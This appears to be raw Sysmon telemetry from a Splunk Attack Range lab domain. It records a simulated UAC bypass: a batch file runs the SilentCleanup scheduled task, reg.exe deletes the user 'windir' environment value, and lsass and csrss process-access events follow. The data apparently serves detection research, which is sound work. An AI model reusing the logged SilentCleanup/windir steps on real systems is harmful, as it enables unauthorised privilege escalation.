07:57:19.164{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.163{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.163{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.162{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.162{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+108c6|c:\windows\system32\UBPM.dll+d439|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+21f3|c:\windows\system32\UBPM.dll+1cdb|c:\windows\system32\UBPM.dll+1b6f|c:\windows\system32\schedsvc.dll+3095b|c:\windows\system32\schedsvc.dll+175bc|c:\windows\system32\schedsvc.dll+3a8de|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c 10341000x80000000000000001050970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.143{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F5DF-60EB-797D-00000000CF01}8368C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.142{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F5DF-60EB-797D-00000000CF01}8368C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.137{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F5DF-60EB-797D-00000000CF01}8368C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.130{466BC892-F5DD-60EB-757D-00000000CF01}969210124C:\Windows\system32\conhost.exe{466BC892-F5DF-60EB-797D-00000000CF01}8368C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.128{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.127{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.127{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.127{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-797D-00000000CF01}8368C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.127{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.125{466BC892-F5DC-60EB-747D-00000000CF01}43042332C:\Windows\system32\cmd.exe{466BC892-F5DF-60EB-797D-00000000CF01}8368C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.126{466BC892-F5DF-60EB-797D-00000000CF01}8368C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating 
SystemMicrosoft Corporationsctasks.exeschtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 23542300x80000000000000001051032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:20.797{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E607741E97D2DC0742FB7A4C014B1C9,SHA256=967CC81940BBCC162AAE6134D41580D7F19580007EE337CFE35BF6FAF348CE36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:20.132{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86370BFD607D25151A06E90194694AD1,SHA256=301911791F39B1D6F1B1F81F2142491B4C0AAE51A6F6B5C2AF7BEE1AC9C2DC52,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808445Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:19.314{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57330-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808444Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:20.619{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808443Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:20.087{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70AA8E2728C84B0F30DF8041036F6874,SHA256=393C3B8379595F9F380284F6BCC5BF76BD6C8B9DC80759EFD086F869A58D76A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:21.808{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C1BF982666A49C9B036E88555417D34,SHA256=F0AE23E8DC5D5DB90956D46BCF7214957DE3C9FE2F7F4CB2EF159AFC58FEE38F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808447Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:20.751{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57331-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000808446Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:21.088{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF5C0245B43583E3CBCE101601AD6E3B,SHA256=60B3149314316C11AA685B4A50EBD48BDFDE95FAC5D62774BEE5354AACE57A45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.826{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7746F372F018E078C95A69C44C3AE0C1,SHA256=8BE0A21C9EAF7159E722FA8A0D7548C583C7E3EE74F0E959809C32760CA89C3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808448Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:22.166{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D58FF22968CFDCF1CA3D2942D91D6BA,SHA256=85E1645E732F203D3B0CAE3E0CD6CEEE0B6AD27420EF2E6B04E1F13A3483B2E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.556{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=B12BEE46ED377316EA6C187CB1F3571E,SHA256=56035FDE68C07F3EB022F32B21D586D40ED9B569611348F7BDCA28C1F1D2A664,IMPHASH=00000000000000000000000000000000falsetrue 
12241200x80000000000000001051042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:57:22.179{466BC892-F5E2-60EB-807D-00000000CF01}928C:\Windows\system32\reg.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\Environment\windir 10341000x80000000000000001051041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.170{466BC892-F5DD-60EB-757D-00000000CF01}969210124C:\Windows\system32\conhost.exe{466BC892-F5E2-60EB-807D-00000000CF01}928C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.163{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:22.163{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.162{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:22.162{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.162{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5E2-60EB-807D-00000000CF01}928C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
